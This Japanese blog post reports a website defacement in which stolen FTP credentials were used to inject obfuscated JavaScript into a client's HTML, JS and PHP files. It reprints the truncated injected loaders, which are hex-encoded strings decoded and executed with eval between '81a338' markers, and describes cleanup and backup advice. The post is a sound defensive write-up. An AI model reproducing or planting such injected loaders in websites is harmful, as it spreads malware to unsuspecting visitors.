WEBサイト改ざん被害

メルです。

かなり仕事を休んでしまったので
「さぁ、仕事!仕事!」と思いきや、
管理しているある企業のサーバーに
不振なFTPアクセスが・・・

アクセス元は、

など・・・。

これはやばいのでは?と思いながら
サーバーの中身を見ると、
なんと大量のファイルが改ざんにあっているではありませんか。

改竄されたページにアクセスすると訪問者のパソコンが
感染し、被害が広まると言うオマケ付き。

改竄されたファイルは、HTMLファイル、JavaScriptファイル、
一部PHPファイルで、<!–81a338–>、/*81a338*/から始まる
JavaScript、iframe などの埋め込みが特徴。

他にも81a338の代わりに0c0896や、ded509などの6桁の
英数字のものもあるようです。

状況から見て、
これは最近非常に被害が増えているパターンで
ガンブラーなどのウイルスやスパイウエアに感染し、
パソコンからFTP情報を搾取され、改竄されている
可能性が高い。

 

 

流石にこれはまずいので、
サイトを閉鎖し、クライアント企業に連絡。

全てのパソコンのウイルスチェックをしてもらい、
サーバー、FTPへのアクセス制限を行い、
全てのパスワードの変更と共に復旧作業に取り掛かることに。

因みに改ざん被害にあったファイルには以下のコードが追加されていました。

 

改ざんされたHTMLファイル

<!--81a338--><script type="text/javascript" language="javascript" >gakqf="s"+"p"+"li"+"t";srkjb=window;fpr="dy";txm=document;rcigwm="0x";kguirj=(5-3-1);try{++(txm.body)}catch(yymj){jpi=false;try{}catch(vji){jpi=21;}
if(1){crqv="17:5d:6c:65:5a:6b:60:66:65:17:6f:58:5c:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6f:58:5c:17:34:17:5b:66:5a:6c
     ・
     ・中略
     ・
5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6f:58:5c:27:30:1f:20:32:4:1:74:4:1:74"[gakqf](":");}srkjb=crqv;cub=[];for(yghxc=22-20-2;-yghxc+1384!=0;yghxc+=1){mfeuzr=yghxc;if((0x19==031))cub+=String["fromCharCode"](eval(rcigwm+srkjb[1*mfeuzr])+0xa-kguirj);}rzosnt=eval;rzosnt(cub)}</script><!--/81a338-->

 

改ざんされたJavaScriptファイル

/*81a338*/
ragir="s"+"p"+"li"+"t";negu=window;zwh="dy";vqpoo=document;rauffm="0x";blye=(5-3-1);try{++(vqpoo.body)}catch(xdomas){jioz=false;try{}catch(dhncm){jioz=21;}
if(1){przkl="17:5d:6c:65:5a:6b:60:66:65:17:60:5d:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:
     ・
     ・中略
     ・
2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:60:5d:27:30:1f:20:32:4:1:74:4:1:74"[ragir](":");}negu=przkl;ljy=[];for(cahkv=22-20-2;-cahkv+1374!=0;cahkv+=1){lufim=cahkv;if((0x19==031))ljy+=String["fromCharCode"](eval(rauffm+negu[1*lufim])+0xa-blye);}klc=eval;klc(ljy)}
/*/81a338*/

 

改ざんされたPHPファイル

#81a338#
if(empty($qk)) {
$qk = "<script type=\"text/javascript\" language=\"javascript\" >gakqf=\"s\"+\"p\"+\"li\"+\"t\";srkjb=window;fpr=\"dy\";txm=document;rcigwm=\"0x\";kguirj=(5-3-1);try{++(txm.body)}catch(yymj){jpi=false;try{}catch(vji){jpi=21;}
if(1){crqv=\"17:5d:6c:65:5a:6b:60:66:65:17:6f:58:5c:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:
     ・
     ・中略
     ・
4:1:74:4:1:74\"[gakqf](\":\");}srkjb=crqv;cub=[];for(yghxc=22-20-2;-yghxc+1384!=0;yghxc+=1){mfeuzr=yghxc;if((0x19==031))cub+=String[\"fromCharCode\"](eval(rcigwm+srkjb[1*mfeuzr])+0xa-kguirj);}rzosnt=eval;rzosnt(cub)}</script>";
echo $qk;
}
#/81a338#

 

このサーバーには月商300万円のネットショップが入っていたので
スピード勝負。

結局なんだかんだで復旧までに丸1日かかってしまいましたが(笑

最近、CMSなどの脆弱性をついた攻撃や、
今回のようにパソコンから情報を搾取しての攻撃など、
非常に被害が広まっています。

またWEBサイトにアクセスするだけでも感染するものも
多数あります。

どこか遠い世界の出来事ではなく、
誰もがいつでも感染する可能性があります。

パソコンのセキュリティはしっかりと導入し、
まめにスキャンして、皆さんも気をつけて下さい。

 

 

— 10/3追記 —

 

このタイプの被害にあった場合の対処法は、
81a338で入れ子になっている部分の記述を削除するしかありません。

被害にあっている事に気付くのが遅いと、
数百から数千ものファイルが書き換えられているため、
手動でファイルを開いて削除していたら大変です。
日頃からサーバー内の全ファイルのバックアップを
まめに取っておく事をお勧めします。

バックアップさえあれば、FTPで一括上書きアップロードで対応できます。

 

 

この投稿は役に立ちましたか? 役に立った 役に立たなかった

 

ネットビジネス速報メールマガジン

 

メルのネットビジネス速報では、悪質高額塾などの被害が拡大しないように
新しい悪質販売者の情報が入り次第、速報でお伝えいたします。

Dreamweaver、Fireworks、PhotoshopなどのTipsやチュートリアルの紹介、
最新SEO情報、その他ネットビジネスに関する情報をいち早く配信しています。

お名前(必須)
メールアドレス(必須)

One Response to “WEBサイト改ざん被害”

  1. […] これは前回、WEBサイト改ざん被害の記事でも書きかましたが、 管理しているパソコンからFTPのパスワードを抜き取られて改竄されます。 […]

記事「WEBサイト改ざん被害」にコメントを残す

*

サブコンテンツ

危険な高額塾

タグ

やしろひろたみ 短縮URL 三橋美仁 HTML4.0 土屋ひろし エディタ ざくざく君 情報商材 Thunderbird Baidu バイマ 久積篤史 掲示板 ドメイン 関根塾 ぼかし 副業術 メモ postpost BBIZ Agency Business 株式会社ニュース やしろ塾 ヤフーショッピング ウインドウ クラウド入力機能 小笠原健一 WP 転売大園塾 秀吉塾天下統一 Google Maps Windows 7 ネットガレージ フレンドシップメール FTP 切り抜き 自己アフィリ force puzzle 背景 与沢翼×蝶乃舞 インターネットビジネススクール 表示 特権ビジネス 登録禁止 ブロック スタイルシート 賢威 自己アフィリエイト レンタルサーバー スカイプ 中山秀人 Tiger-Wing PHP 球体 無料 伊藤塾 滑らか テーマ エキスパートメール 放射線 バイドゥー アレックス パズル SmoothScroll.js 株式会社A-ブログレス document.all Google Maps API アクセス制限 宮田麗花 大園麗花 Line DTD せどり ユーチューブマニアクス2017 スマホ セキュリティ SKナレッジ 石井匠 株式会社Free Agent Style explorer マイクロソフト YouTube Maniax 2017 クラック 不正送信 大園式転売塾 既得権益 株式会社SRシステム タイガーウイング MovableTYpe 大園転売塾 CS6 インフォトップ android google ネットビジネス最後の楽園 詐欺組織 KMS認証 サンタ ヤフー クラウド変換 蝶乃舞 スクロール 山下 SyntaxHighlighter レイアウト崩れ 自動 バナー functions.php twitter ワードプレス 音量アイコン ボタン 百度 ネットビジネス大全集 スムーズ エクスチェンジ ツイッター 出店料 マニュアル wpXサーバー CGI Windows 個人情報 SEO ネットショップ インターネット 量産 マルウエア ブラウザ フォローマティック ping 画像 ハート クロスアフィリエイト トラフィック Wordpress Content Slide プロファイル JavaScript ブラクラ Diamond Affiliate Masters Program 加工 iphone 上位表示 Internet Explorer BUYMA 加藤 秀吉 トレンドキーワード 伊藤 虎太郎 グラデーション 復元 レタープレス 株式会社SRシステム 短縮URLツール Login LockDown High Concept Marketing RMT 伊藤虎太郎 css カスタマイズ ファビコン getElementById 秒速で1億円稼ぐ男 流出 Yahoo プロモーション 81a338 ソフト アクセスアップ Newpost Catch Favicon ライオンアフィリエイト moza アドセンス ソース 比較 特定のメールアドレス 関根義光 管理画面 不労所得の神 伊藤 歩 レビュー @PAGES wordpress 立体 アンダーグラウンドメソッド CS5 コピーボタン 北川 雅嗣 インターネットエクスプローラー トレンドアフィリエイト 権利収入 詐欺 メルマガ配信システム ウイルス 自動化 DOCTYPE ヤフオク WEB 株式会社バンザイ 個人情報流出 バックアップ ping送信 wp-login.php html Chrome office 池田純矢 ソースコード ランキング ネットゲーム 新井浩 がら空きビジネス 村上省吾 ロリポップ 無断送信 Extension Manager サイト改ざん アフィ匠 ブラシ 大西良幸 クリックランキング ビジネス シャンプー ECサイト 株式会社WINGOOD tool Cash on Wordpress ネオヒルズアカデミー KMSpico EC LinkShaker ライブチャット 改ざん 日本語入力変換ソフト IE リンクシェイカー ブロックポリシー 脆弱性 定型文 レイアウト インペリアルゴールド Ban Hammer エクスプローラー Youtube プラグイン 与沢翼 テンプレート RSS Includes Pages .htaccess ツール IBS FireWorks アンダーグラウンドアフィリエイトクラブ 改竄 MasterCollection タスクバー getElementByTagName Firefox 管理ツール 原田真 followmatic MT 不正アクセス 高速ゲーム アフィリエイト 高額塾 到達率 PPC ブルートフォースアタック 申請金ビジネス アイコン 人物 system 固定ページ 無料オファー モザイク 優先順位 デスクトップ 配布 Adobe ネットビジネス 感染 RSS XHTML アレックス式ネオせどりスクール ライン IP もざ ムーバブルタイプ 切抜き

アーカイブ

エステトラブル

このページの先頭へ